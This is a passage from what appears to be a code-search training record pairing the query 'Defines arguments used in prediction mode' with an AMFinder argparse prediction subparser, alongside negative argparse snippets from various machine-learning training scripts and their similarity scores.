sentences.')\n parser.add_argument('--metrics', type=argparse.FileType(\"w\"), default=sys.stdout,\n help='where to output metrics computed on validation.')\n parser.add_argument('--mode', choices=['BASELINE', 'BASELINE_C', 'BASELINE_C_POS'], default='BASELINE',\n help='mode in which model is trained, C adds cue information, POS adds pos tags.')\n parser.add_argument('--arch', choices=['LSTM', 'GRU'], default='LSTM',\n help='which recurrent network architecture to use.')\n parser.add_argument('--word_vectors', default=None,\n help='file with word embeddings')\n parser.add_argument('--epochs', type=int, default=10,\n help='number of epochs to train the model.')\n parser.add_argument('--lr', type=float, default=1e-4,\n help='learning rate used in adam optimizer.')\n parser.add_argument('--max_len', type=int, default=100,\n help='maximum length of sentence.')\n parser.add_argument('--hidden_size', type=int, default=200,\n help='memory size of recurrent neural network.')\n parser.add_argument('--negations_only', action='store_true', default=False,\n help='if present, only sentences with at least one negation are used.')\n parser.add_argument('--tensorboard', action='store_true', default=False)\n parser.add_argument('--save', default=None, help='directory where to save model.')\n\n return parser.parse_args()", "def feed_evaluation_args(self):\n return {}", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"DeepLabLFOV Network Inference.\")\n parser.add_argument(\"model_weights\", type=str,\n help=\"Path to the file with model weights.\")\n parser.add_argument(\"--save_dir\", type=str, default=SAVE_DIR,\n help=\"Where to save predicted mask.\")\n return parser.parse_args()", "def get_args():\n parser = argparse.ArgumentParser()\n 
parser.add_argument('--lr', type=float, default=0.001, help='set learning rate')\n parser.add_argument('--batch_size', type=int, default=16, help='set batch size')\n parser.add_argument('--epoch', type=int, default=20, help='set the epoches')\n parser.add_argument('--optimizer',type=str,default='adam', help='set the optimizer to use')\n parser.add_argument('--model',type=str,default='dnn', help='determine which model to use')\n parser.add_argument('--act',type=str,default='relu', help='determine which activation function to use')\n parser.add_argument('--loss_func',type=str,default='crossentropy', help='determine which loss function to use')\n parser.add_argument('--device',type=str,default='cuda',help='determine the device to use, set \\n--device cpu\\nif you do not want to use cuda')\n parser.add_argument('--checkpoints_path',type=str,default='./checkpoints', help=\"the path to save the model you have trained. Make sure it's valid.\")\n parser.add_argument('--data_path',type=str,default='./datasets', help=\"the path to download the mnist dataset or its location if you have download it, make sure it's valid\")\n return parser.parse_args()", "def parse_args():\n parser = ArgumentParser(description='Implicit Recommender')\n parser.add_argument('--path', type=Path, default=Path('../'), help='Input data path for train\\\\test')\n parser.add_argument('--train_fp', type=Path, default=Path('train.csv'), help='Train file name')\n parser.add_argument('--test_fp', type=Path, default=Path('test.csv'), help='Test file name')\n parser.add_argument('--epochs', type=int, default=2, help='Number of epochs')\n parser.add_argument('--bs', type=int, default=2048, help='Batch size')\n parser.add_argument('--layers', type=int, nargs='+', default=[32, 48, 32, 16],\n help='Size of each layer. The first layer is a concatenation of user and item embeddings. 
So '\n 'layers[0]/2 is the embedding size', )\n parser.add_argument('--weight_decay', type=float, default=0.00001, help='Regularization for each layer')\n parser.add_argument('--num_neg_train', type=int, default=200,\n help='Number of negative instances while training')\n parser.add_argument('--num_neg_test', type=int, default=20,\n help='Number of negative instances while testing') # doesn't work\n parser.add_argument('--lr', type=float, default=0.001, help='Learning rate')\n parser.add_argument('--dropout', type=float, default=.1, help='Dropout prob after each dense layer')\n parser.add_argument('--learner', default='adam', choices=('adagrad', 'adam', 'rmsprop', 'sgd'),\n help='Specify an optimizer')\n parser.add_argument('--verbose', type=lambda x: str(x).lower() == 'true', default=True,\n help='Show performance per X iterations')\n parser.add_argument('--seed', type=int, default=33,\n help='Random state for all')\n parser.add_argument('--ckpt_callback_fp', type=Path, default=Path(datetime.today().strftime(\"%Y-%m-%d\")),\n help='Checkpoint callback filepath')\n parser.add_argument('--experiment_name', type=str, default=f'{datetime.today().strftime(\"%Y-%m-%d\")}',\n help='Experiment filepath')\n parser.add_argument('--map_item_id_name_fp', type=Path,\n default=Path(f'{datetime.today().strftime(\"%Y-%m-%d\")}_map_item_id_name_fp.json'), help='')\n return parser.parse_args()", "def settings(args):\n data = {}\n data['train_x'] = load_pkl(os.path.join(args.data_dir, 'train_images.pkl'))\n data['train_y'] = load_pkl(os.path.join(args.data_dir, 'train_labels.pkl'))\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'valid_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, 'valid_labels.pkl'))\n if args.combine_train_val:\n data['train_x'].update(data['valid_x'])\n data['train_y'].update(data['valid_y'])\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'test_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, './data/bsd_pkl_float/test_labels.pkl'))\n args.display_step = len(data['train_x']) / 46\n # Default configuration\n if args.default_settings:\n args.n_epochs = 250\n args.batch_size = 10\n args.learning_rate = 3e-2\n args.std_mult = 0.8\n args.delay = 8\n args.filter_gain = 2\n args.filter_size = 5\n args.n_rings = 4\n args.n_filters = 7\n args.save_step = 5\n args.height = 321\n args.width = 481\n\n args.n_channels = 3\n args.lr_div = 10.\n args.augment = True\n args.sparsity = True\n\n args.test_path = args.save_name\n args.log_path = './logs'\n args.checkpoint_path = './checkpoints'\n\n make_dirs(args, args.test_path)\n make_dirs(args, args.log_path)\n make_dirs(args, args.checkpoint_path)\n\n return args, data" ]
[ "0.7736733", "0.7350229", "0.72321266", "0.72048527", "0.7092233", "0.6984818", "0.69702905", "0.6870562", "0.6834763", "0.6788515", "0.6737505", "0.6594925", "0.6524672", "0.6498421", "0.64617753", "0.64401156", "0.64344376", "0.643193", "0.64313674", "0.6415906", "0.64103043", "0.6370354", "0.63681483", "0.6361254", "0.63356185", "0.6327066", "0.6323624", "0.6317288", "0.6303118", "0.62908524", "0.62723184", "0.6268827", "0.6267587", "0.62293285", "0.622117", "0.620097", "0.6199103", "0.61918527", "0.61902916", "0.61848444", "0.6182543", "0.6182543", "0.6182543", "0.6182543", "0.6182543", "0.61794853", "0.6175855", "0.61739844", "0.61668205", "0.616228", "0.61538297", "0.6150711", "0.6137793", "0.6135971", "0.61281335", "0.61240864", "0.6121958", "0.6116249", "0.6113766", "0.6108102", "0.61074823", "0.6095049", "0.60812926", "0.6077155", "0.6074092", "0.6073565", "0.6070735", "0.6059552", "0.6058486", "0.6058134", "0.6056613", "0.6054622", "0.6035288", "0.6029786", "0.60263646", "0.6026173", "0.6021084", "0.60168725", "0.60167605", "0.60124385", "0.6006958", "0.6005426", "0.60042113", "0.599878", "0.5996425", "0.59829617", "0.5977419", "0.59773356", "0.59769094", "0.5974554", "0.5972411", "0.5970411", "0.5969379", "0.59673464", "0.5964597", "0.59609747", "0.5958474", "0.5955628", "0.595544", "0.5953783", "0.5945891" ]
0.0
-1
Defines arguments used in prediction mode.
def prediction_subparser(subparsers):

    parser = subparsers.add_parser('predict',
        help='Runs AMFinder in prediction mode.',
        formatter_class=RawTextHelpFormatter)

    x = PAR['tile_edge']
    parser.add_argument('-t', '--tile_size',
        action='store', dest='edge', type=int, default=x,
        help='Tile size (in pixels) used for image segmentation.'
             '\ndefault value: {} pixels'.format(x))

    parser.add_argument('-sr', '--super_resolution',
        action='store_const', dest='super_resolution', const=True,
        help='Apply super-resolution before predictions.'
             '\ndefault value: no super-resolution.')

    x = 'SRGANGenv1beta.h5'
    parser.add_argument('-g', '--generator',
        action='store', dest='generator', metavar='H5', type=str, default=x,
        help='name of the pre-trained generator.'
             '\ndefault value: {}'.format(x))

    x = PAR['colormap']
    parser.add_argument('-map', '--colormap',
        action='store', dest='colormap', metavar='id', type=str, default=x,
        help='Name of the colormap used to display conv2d outputs and kernels.'
             '\ndefault value: {}'.format(x))

    x = 'CNN1v2.h5'
    parser.add_argument('-net', '--network',
        action='store', dest='model', metavar='H5', type=str, default=x,
        help='name of the pre-trained model to use for predictions.'
             '\ndefault value: {}'.format(x))

    parser.add_argument('-so', '--save_conv2d_outputs',
        action='store_const', dest='save_conv2d_outputs', const=True,
        help='save conv2d outputs in a separate zip file.'
             '\ndefault value: False')

    parser.add_argument('-sk', '--save_conv2d_kernels',
        action='store_const', dest='save_conv2d_kernels', const=True,
        help='save convolution kernels in a separate zip file (takes time).'
             '\ndefault value: False')

    x = PAR['input_files']
    parser.add_argument('image', nargs='*', default=x,
        help='plant root scan to be processed.'
             '\ndefault value: {}'.format(x))

    return parser
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_args(self, args: Namespace) -> None:\n self.epochs = args.epochs\n self.lrdecay = args.lrdecay\n self.lrpatience = args.lrpatience\n self.ntest = args.ntest\n self.ndiscard = args.ndiscard\n self.predict = args.predict\n self.printfreq = args.printfreq\n self.savefreq = args.savefreq\n self.resume = args.resume\n self.seed = args.seed\n self.timesteps = args.timesteps\n self.verbose = args.verbose", "def feed_training_args(self):\n return {}", "def predict_input_args():\n # Create Parse using ArgumentParser\n parser = argparse.ArgumentParser()\n parser.add_argument('image', type = str, help = 'Path to the folder and file name of image to be checked') \n parser.add_argument('checkpoint', type = str, help = 'Checkpoint folder name') \n parser.add_argument('--gpu', type = bool, default = False, help = 'True = GPU enabled, False = GPU disabled') \n parser.add_argument('--topk', type = int, default = 5, help = 'Top number of class predicitions') \n parser.add_argument('--json', type = str, default = 'cat_to_name.json', help = 'Path to the folder and file name of JSON map used') \n return parser.parse_args()", "def predict_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('image_path',\n help=\"Path to the image file\")\n\n parser.add_argument('checkpoint',\n default='checkpoint.pth',\n help=\"Path to the model checkpoint\")\n\n parser.add_argument('--top_k',\n dest='top_k',\n default=5,\n help=\"Return top K most likely classes\",\n type=int)\n\n parser.add_argument('--category_names',\n dest='category_names',\n default='cat_to_name.json',\n help='Use a mapping of categories to real names: '\n )\n\n parser.add_argument('--gpu', action='store_true',\n dest='gpu',\n help='Activate GPU')\n\n result = parser.parse_args()\n\n return result", "def add_train_val_arguments(self):\n self.add_train_arguments()\n self.add_val_arguments()", "def define_parameters(self):", "def create_training_args(self, input_dict, output_dict, exec_properties,\n executor_class_path, training_inputs,\n job_id) -> Dict[Text, Any]:\n pass", "def set_arg_types( self ):\n if self.mode == 'grad':\n self.function = terms.dw_grad\n use_method_with_name( self, self.get_fargs_grad, 'get_fargs' )\n elif self.mode == 'div':\n self.function = terms.dw_div\n use_method_with_name( self, self.get_fargs_div, 'get_fargs' )\n else:\n self.function = self.d_eval\n use_method_with_name( self, self.get_fargs_eval, 'get_fargs' )\n self.use_caches = {'state_in_volume_qp' : [['parameter_s']],\n 'div_vector' : [['parameter_v']]}", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def apply_args(self):\n\n args = self.args\n\n Test.compile_only = args.compile_only\n Test.skip_comparison = args.skip_comparison\n Test.global_tolerance = args.tolerance\n Test.global_abs_tolerance = args.abs_tolerance\n Test.global_particle_tolerance = args.particle_tolerance\n Test.performance_params = args.check_performance", "def parse_args(self):\n\n dict_args = dict()\n dict_args['hid'] = 64 # size of each hidden layer\n dict_args['l'] = 2 # number of layers\n\n dict_args['seed'] = 0 # Discard as this will cause identical results for PLA\n dict_args['cpu'] = 4 # MPI\n dict_args['exp_name'] = 'ppo'\n\n dict_args['epochs'] = 1000\n dict_args['steps_per_epoch'] = 25 # default 4000\n dict_args['pi_lr'] = 3e-4\n dict_args['vf_lr'] = 1e-3\n 
dict_args['train_pi_iters'] = 5 # default 80\n dict_args['train_v_iters'] = 5 # default 80\n dict_args['max_ep_len'] = 25 # default 1000, this needs to be the same as steps_per_epoch for Unity environment\n dict_args['target_kl'] = 0.01\n dict_args['clip_ratio'] = 0.2\n dict_args['lam'] = 0.97\n dict_args['gamma'] = 0.99\n dict_args['save_freq'] = 10\n dict_args['ac_kwargs'] = dict(hidden_sizes=[dict_args['hid']]*dict_args['l'])\n return dict_args", "def set_prediction_parameters(self, freq, prediction_length):\r\n self.freq = freq\r\n self.prediction_length = prediction_length", "def add_train_args(parser):\n\n # Runtime environment\n runtime = parser.add_argument_group('Environment')\n runtime.add_argument('--dataset', type=str, default=\"searchqa\",\n help='Dataset: searchqa, quasart or unftriviaqa')\n runtime.add_argument('--base_dir', type=str, default=\".\",\n help='base_dir of the pre-processing')", "def set_prediction_parameters(self, freq, prediction_length):\r\n self.__freq = freq\r\n self.__prediction_length = prediction_length", "def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)", "def Args(parser):\n # TODO(user): move all flags definition to api_lib/ml/flags.py.\n parser.add_argument('job', help='Name of the batch prediction job.')\n parser.add_argument('--model', required=True, help='Name of the model.')\n parser.add_argument(\n '--version',\n help='Model version to be used. If unspecified, the default version '\n 'of the model will be used.')\n # input location is a repeated field.\n parser.add_argument(\n '--input-paths',\n type=arg_parsers.ArgList(min_length=1),\n required=True,\n help='Google Cloud Storage paths to the instances to run prediction on.'\n ' Wildcards accepted. Multiple paths can be specified if more than one '\n 'file patterns are needed. Example: '\n 'gs://my-bucket-0/instances0,gs://my-bucket-1/instances1')\n parser.add_argument(\n '--data-format',\n required=True,\n choices=['TEXT', 'TF_RECORD'],\n help='Data format of the input files.')\n parser.add_argument(\n '--output-path', required=True,\n help='Google Cloud Storage path to which to save the output. '\n 'Example: gs://my-bucket/output.')\n parser.add_argument(\n '--region',\n required=True,\n help='The Google Compute Engine region to run the job in.')", "def _setup_arguments(self):\n\n self._parser.add_argument(\"-a\", \"--area-interest\",\n help=\"Area of interest to process, \"\n \"shapefile path\", required=True)\n # FUTURE VERSIONS\n # self._parser.add_argument(\"-s\", \"--srtm-dem\",\n # help=\"Path to SRTM DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-y\", \"--hsheds-dem\",\n # help=\"Path to HSHEDS DEM file. Zip format\",\n # required=False)\n # self._parser.add_argument(\"-g\", \"--groves-file\",\n # help=\"Path to groves classification file. 
\"\n # \"Zip format\",\n # required=False)", "def extra_target_arguments(self):\n return {}", "def preprocess_arguments(self, *args, **kwargs):\n return (args, kwargs)", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"DeepLabLFOV Network Inference.\")\n parser.add_argument(\"--train_set\", type=str, default=\"drill\",\n help=\"Number of classes to predict (including background).\")\n args = parser.parse_args()\n train_set = args.train_set\n\n #test_set = \"drill_11_test_scenes\"\n\n NUM_CLASSES = 8\n SAVE_DIR = './testing_softmax_output/'\n DATA_DIR = '/'\n DATA_LIST_PATH = '/home/peteflo/spartan/src/CorlDev/experiments/sixobjects_multi_test_scenes.txt.imglist.txtdownsampled10.txt'\n DATA_DIRECTORY = ''\n IGNORE_LABEL = 255\n RESTORE_FROM = './snapshots_' + train_set + '/model.ckpt-20000'\n \n parser.add_argument(\"--num-classes\", type=int, default=NUM_CLASSES,\n help=\"Number of classes to predict (including background).\")\n parser.add_argument(\"--save-dir\", type=str, default=SAVE_DIR,\n help=\"Where to save predicted mask.\")\n parser.add_argument(\"--data-list\", type=str, default=DATA_LIST_PATH,\n help=\"Path to the file listing the images in the dataset.\")\n parser.add_argument(\"--data-dir\", type=str, default=DATA_DIRECTORY,\n help=\"Path to the directory containing the PASCAL VOC dataset.\")\n parser.add_argument(\"--ignore-label\", type=int, default=IGNORE_LABEL,\n help=\"The index of the label to ignore during the training.\")\n parser.add_argument(\"--restore-from\", type=str, default=RESTORE_FROM,\n help=\"Where restore model parameters from.\")\n return parser.parse_args()", "def base_arguments(self):\n raise NotImplementedError()", "def feed_evaluation_args(self):\n return {}", "def add_train_arguments(self):\n parser = self.parser\n parser.add_argument(\"source_dir\", help=\"Directory containing test source images.\")\n parser.add_argument(\"target_dir\", help=\"Directory containing test target images.\")\n parser.add_argument(\"--batch_size\", \"-bs\", default=1, type=int, help=\"Batch size.\")\n parser.add_argument(\"--cycle_loss_weight\", \"-clw\", default=0, type=int, help=\"Cycle loss weight.\")\n parser.add_argument(\n \"--discriminator_architecture\", \"-d\", default=\"basic\",\n help=\"architecture of the discriminator ('basic' | 'N_layers')\"\n )\n parser.add_argument(\n \"--discriminator_filters\", \"-df\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the discriminator.\"\n )\n parser.add_argument(\n \"--n_frames_discriminator\", \"-dn\", type=int, default=0,\n help=\"Number of frames the sequence discriminators discriminate.\"\n )\n parser.add_argument(\n \"--discriminator_temporal_scales\", \"-dts\", type=int, default=1,\n help=\"Number of temporal scales in framerate sampling (= number of sequence discriminators).\"\n )\n parser.add_argument(\n \"--feature_matching_loss_weight\", \"-fmlw\", default=0, type=int, help=\"Loss weight of feature matching.\"\n )\n parser.add_argument(\n \"--flow_loss_weight\", \"-flw\", default=0, type=int, help=\"Loss weight of flow loss in vid2vid.\"\n )\n parser.add_argument(\n \"--gan_mode\", \"-gan\", default=\"lsgan\", help=\"type of the gan loss ('vanilla' | 'lsgan' | 'wgangp').\"\n )\n parser.add_argument(\n \"--init_epoch\", \"-ie\", default=0, type=int, help=\"If set, load models saved at a specific epoch.\"\n )\n parser.add_argument(\n \"--init_checkpoint_dir\", \"-i\",\n help=\"If set, initialize models from saved checkpoints in init_checkpoint_dir.\"\n )\n 
parser.add_argument(\n \"--log_every\", \"-le\", default=100, type=int, help=\"Log losses and images every log_every iterations.\"\n )\n parser.add_argument(\n \"--log_images_every\", \"-lie\", default=0, type=int,\n help=\"If specified, log images every log_images_every iterations, instead of every log_every iterations.\"\n )\n parser.add_argument(\"--load_height\", \"-lh\", type=int, default=0, help=\"image load height (before cropping).\")\n parser.add_argument(\"--l1_loss_weight\", \"-llw\", default=0, type=int, help=\"L1 loss weight.\")\n parser.add_argument(\"--learning_rate\", \"-lr\", default=0.0002, type=float, help=\"Learning rate.\")\n parser.add_argument(\"--load_width\", \"-lw\", type=int, default=0, help=\"Image load width (before cropping).\")\n parser.add_argument(\n \"--mask_loss_weight\", \"-mlw\", default=0, type=int, help=\"Loss weight of mask loss (weight loss) in vid2vid.\"\n )\n parser.add_argument(\"--num_epochs\", \"-ne\", default=10, type=int, help=\"Number of training epochs.\")\n parser.add_argument(\n \"--perceptual_loss_weight\", \"-plw\", default=0, type=int, help=\"Loss weight of perceptual (VGG19) loss.\"\n )\n parser.add_argument(\n \"--recycle_loss_weight\", \"-rclw\", default=0, type=int, help=\"Loss weight of recycle in RecycleGAN.\"\n )\n parser.add_argument(\n \"--recycle_predictor_architecture\", \"-rcp\", default=\"resnet_6blocks\",\n help=\"Architecture of RecycleGAN predictor. See generator_architecture for options.\"\n )\n parser.add_argument(\n \"--recycle_predictor_filters\", \"-rcpf\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the RecycleGAN predictor.\"\n )\n parser.add_argument(\n \"--save_every\", \"-se\", default=1, type=int, help=\"Save model checkpoints every save_every epochs.\"\n )\n parser.add_argument(\n \"--spatial_scaling\", \"-ss\", default=[1], type=float, nargs='+',\n help=\"Set steps for spatial scaling.\\n\"\n \"I.e. [0.25, 0.5, 1] to train a model with width and height 256 on 64 > 128 > 256 images.\"\n )\n parser.add_argument(\"--timecycle_loss\", \"-tcl\", default=\"l1\", help=\"Timecycle loss ('l1' | 'l2')\")\n parser.add_argument(\"--timecycle_loss_weight\", \"-tclw\", default=0, type=int, help=\"Timecycle loss weight.\")\n parser.add_argument(\n \"--timecycle_motion_model_architecture\", \"-tcmm\", default=\"resnet_1blocks\",\n help=\"Architecture of Timecycle motion model. See generator_architecture for options.\"\n )\n parser.add_argument(\n \"--timecycle_motion_model_filters\", \"-tcmmf\", type=int, default=64,\n help=\"Number of filters in the last conv layer of the Timecycle motion model.\"\n )\n parser.add_argument(\n \"--timecycle_separate_motion_models\", \"-tcsmm\", action=\"store_true\",\n help=\"Set to use separate motion models for forward/backward predictions.\"\n )\n parser.add_argument(\n \"--timecycle_type\", \"-tct\", default=\"conditional\",\n help=\"Type of Timecycle ('conditional' | 'pingpong').\"\n )\n parser.add_argument(\n \"--timecycle_warp_loss_weight\", \"-tcwlw\", default=0, type=int, help=\"Timecycle warp loss weight.\"\n )\n parser.add_argument(\n \"--temporal_scaling\", \"-ts\", default=[1], type=float, nargs='+',\n help=\"Set steps for temporal scaling.\\n\"\n \"I.e. 
[0.2, 0.6, 1] to train a model with block_size 5 on 1 -> 3 -> 5 frames.\"\n )\n parser.add_argument(\n \"--warp_loss_weight\", \"-wlw\", default=0, type=int, help=\"Loss weight of warp loss in vid2vid.\"\n )", "def modify_train_args(args: Namespace):\n if args.message.startswith('tetra'):\n setattr(args, 'tetra', True)\n else:\n setattr(args, 'tetra', False)\n\n # shuffle=False for custom sampler\n if args.shuffle_pairs:\n setattr(args, 'no_shuffle', True)\n\n setattr(args, 'device', torch.device('cuda' if torch.cuda.is_available() else 'cpu'))", "def _set_params(self, estimator_args, scaler_args, execution_args, metric_args=None, dim_reduction_args=None):\n \n # Set default values which will be used if execution arguments are not passed\n \n # Default parameters:\n self.model.overwrite = True\n self.model.debug = False\n self.model.test_size = 0.33\n self.model.cv = 0\n self.model.time_series_split = 0\n self.model.max_train_size = None\n self.model.random_state = 42\n self.model.compress = 3\n self.model.retain_data = False\n self.model.scale_hashed = True\n self.model.scale_vectors = True\n self.model.scaler = \"StandardScaler\"\n self.model.scaler_kwargs = {}\n self.model.estimator_kwargs = {}\n self.model.missing = \"zeros\"\n self.model.calc_feature_importances = False\n self.model.importances_n_repeats = 30\n self.model.lags= None\n self.model.lag_target = False\n self.model.scale_target = False\n self.model.scale_lag_target= True\n self.model.make_stationary = None\n self.model.stationarity_lags = [1]\n self.model.using_keras = False\n self.model.current_sample_as_input = True\n self.model.prediction_periods = 1\n \n # Default metric parameters:\n if metric_args is None:\n self.model.metric_args = {}\n \n # Set execution parameters\n \n # If the execution key word arguments were included in the request, get the parameters and values\n if len(execution_args) > 0:\n \n # Transform the string of arguments into a dictionary\n execution_args = utils.get_kwargs(execution_args)\n \n # Set the overwite parameter if any existing model with the specified name should be overwritten\n if 'overwrite' in execution_args:\n self.model.overwrite = 'true' == execution_args['overwrite'].lower()\n \n # Set the test_size parameter that will be used to split the samples into training and testing data sets\n # Default value is 0.33, i.e. we use 66% of the samples for training and 33% for testing\n if 'test_size' in execution_args:\n self.model.test_size = utils.atof(execution_args['test_size'])\n\n # Enable K-fold cross validation. For more information see: http://scikit-learn.org/stable/modules/cross_validation.html#multimetric-cross-validation\n # Default value is 0 in which case a simple holdout strategy based on the test_size parameter is used.\n # If cv > 0 then the model is validated used K = cv folds and the test_size parameter is ignored.\n if 'cv' in execution_args:\n self.model.cv = utils.atoi(execution_args['cv'])\n \n # Enable timeseries backtesting using TimeSeriesSplit. 
https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.TimeSeriesSplit.html\n # This will select the a validation strategy appropriate for time series and sequential data.\n # The feature definitions must include an 'identifier' field which can be used to sort the series into the correct order.\n # The integer supplied in this parameter will split the data into the given number of subsets for training and testing.\n if 'time_series_split' in execution_args:\n self.model.time_series_split = utils.atoi(execution_args['time_series_split'])\n\n # This parameter can be used together with time_series_split.\n # It specifies the maximum samples to be used for training in each split, which allows for rolling/ walk forward validation.\n if 'max_train_size' in execution_args:\n self.model.max_train_size = utils.atoi(execution_args['max_train_size'])\n\n # Add lag observations to the feature matrix. Only applicable for Keras models.\n # An identifier field must be included in the feature definitions to correctly sort the data for this capability.\n # For e.g. if lags=2, features from the previous two samples will be concatenated as input features for the current sample.\n # This is useful for framing timeseries and sequence prediction problems into 3D or 4D data required for deep learning.\n if 'lags' in execution_args:\n self.model.lags = utils.atoi(execution_args['lags'])\n\n # Include targets in the lag observations\n # If True an additional feature will be created for each sample using the previous value of y \n if 'lag_target' in execution_args:\n self.model.lag_target = 'true' == execution_args['lag_target'].lower()\n \n # Scale the target before fitting\n # The scaling will be inversed before predictions so they are returned in the original scale \n if 'scale_target' in execution_args:\n self.model.scale_target = 'true' == execution_args['scale_target'].lower()\n\n # Scale lag values of the targets before fitting\n # Even if scale_target is set to false, the lag values of targets being used as features can be scaled by setting this to true \n if 'scale_lag_target' in execution_args:\n self.model.scale_lag_target = 'true' == execution_args['scale_lag_target'].lower()\n\n # Make the target series more stationary. This only applies to sequence prediction problems.\n # Valid values are 'log' in which case we apply a logarithm to the target values,\n # or 'difference' in which case we transform the targets into variance from the previous value.\n # The transformation will be reversed before returning predictions.\n if 'make_stationary' in execution_args:\n self.model.make_stationary = execution_args['make_stationary'].lower()\n\n # Provide lags periods for differencing\n # By default the difference will be done with lag = 1. Alternate lags can be provided by passing a list of lags as a list.\n # e.g. 
'stationarity_lags=1;12|list|int'\n if 'stationarity_lags' in execution_args:\n self.model.stationarity_lags = utils.get_kwargs_by_type({'stationarity_lags': execution_args['stationarity_lags']})['stationarity_lags']\n\n # Specify if the current sample should be used as input to the model\n # This is to allow for models that only use lag observations to make future predictions\n if 'current_sample_as_input' in execution_args:\n self.model.current_sample_as_input = 'true' == execution_args['current_sample_as_input'].lower()\n\n # Specify the number of predictions expected from the model\n # This can be used to get a model to predict the next m periods given inputs for the previous n periods.\n # This is only valid for Keras models which have a final output layer with more than one node\n if 'prediction_periods' in execution_args:\n self.model.prediction_periods = utils.atoi(execution_args['prediction_periods'])\n \n # Seed used by the random number generator when generating the training testing split\n if 'random_state' in execution_args:\n self.model.random_state = utils.atoi(execution_args['random_state'])\n \n # Compression level between 1-9 used by joblib when saving the model\n if 'compress' in execution_args:\n self.model.compress = utils.atoi(execution_args['compress'])\n \n # Flag to determine if the training and test data should be saved in the model\n if 'retain_data' in execution_args:\n self.model.retain_data = 'true' == execution_args['retain_data'].lower()\n\n # Flag to determine if feature importances should be calculated when the fit method is called\n if 'calculate_importances' in execution_args:\n self.model.calc_feature_importances = 'true' == execution_args['calculate_importances'].lower()\n\n # Sets the number of times a feature is randomly shuffled during the feature importance calculation\n if 'importances_n_repeats' in execution_args:\n self.model.importances_n_repeats = utils.atoi(execution_args['importances_n_repeats'])\n \n # Set the debug option for generating execution logs\n # Valid values are: true, false\n if 'debug' in execution_args:\n self.model.debug = 'true' == execution_args['debug'].lower()\n \n # Additional information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n # Increment log counter for the class. 
Each instance of the class generates a new log.\n self.__class__.log_no += 1\n\n # Create a log file for the instance\n # Logs will be stored in ..\\logs\\SKLearn Log <n>.txt\n self.logfile = os.path.join(os.getcwd(), 'logs', 'SKLearn Log {}.txt'.format(self.log_no))\n \n # Create dictionary of parameters to display for debug\n self.exec_params = {\"overwrite\":self.model.overwrite, \"test_size\":self.model.test_size, \"cv\":self.model.cv,\\\n \"time_series_split\": self.model.time_series_split, \"max_train_size\":self.model.max_train_size, \"lags\":self.model.lags,\\\n \"lag_target\":self.model.lag_target, \"scale_target\":self.model.scale_target, \"make_stationary\":self.model.make_stationary,\\\n \"random_state\":self.model.random_state, \"compress\":self.model.compress, \"retain_data\":self.model.retain_data,\\\n \"calculate_importances\": self.model.calc_feature_importances, \"importances_n_repeats\": self.model.importances_n_repeats,\\\n \"debug\":self.model.debug}\n\n self._print_log(1)\n \n # If the scaler key word arguments were included in the request, get the parameters and values\n if len(scaler_args) > 0:\n \n # Transform the string of arguments into a dictionary\n scaler_args = utils.get_kwargs(scaler_args)\n \n # Set scaler arguments that will be used when preprocessing the data\n # Valid values are: StandardScaler, MinMaxScaler, MaxAbsScaler, RobustScaler and QuantileTransformer\n # More information here: http://scikit-learn.org/stable/modules/preprocessing.html\n if 'scaler' in scaler_args:\n self.model.scaler = scaler_args.pop('scaler')\n \n if 'missing' in scaler_args:\n self.model.missing = scaler_args.pop('missing').lower()\n \n if 'scale_hashed' in scaler_args:\n self.model.scale_hashed = 'true' == scaler_args.pop('scale_hashed').lower()\n \n if 'scale_vectors' in scaler_args:\n self.model.scale_vectors = 'true' == scaler_args.pop('scale_vectors').lower()\n \n # Get the rest of the scaler parameters, converting values to the correct data type\n self.model.scaler_kwargs = utils.get_kwargs_by_type(scaler_args) \n else:\n err = \"Arguments for scaling did not include the scaler name e.g StandardScaler\"\n raise Exception(err)\n \n # If the estimator key word arguments were included in the request, get the parameters and values\n if len(estimator_args) > 0:\n \n # Transform the string of arguments into a dictionary\n estimator_args = utils.get_kwargs(estimator_args)\n \n # Set estimator arguments that will be used when preprocessing the data\n # The parameters available will depend on the selected estimator\n # More information here: http://scikit-learn.org/stable/modules/classes.html#api-reference\n if 'estimator' in estimator_args:\n self.model.estimator = estimator_args.pop('estimator')\n \n # Set the estimator type for the model\n if self.model.estimator in self.classifiers:\n self.model.estimator_type = \"classifier\"\n elif self.model.estimator in self.regressors:\n self.model.estimator_type = \"regressor\"\n elif self.model.estimator in self.decomposers:\n self.model.estimator_type = \"decomposer\"\n elif self.model.estimator in self.clusterers:\n self.model.estimator_type = \"clusterer\"\n else:\n err = \"Unknown estimator class: {0}\".format(self.model.estimator)\n raise Exception(err)\n\n # Get the rest of the estimator parameters, converting values to the correct data type\n self.model.estimator_kwargs = utils.get_kwargs_by_type(estimator_args) \n else:\n err = \"Arguments for estimator did not include the estimator class e.g. 
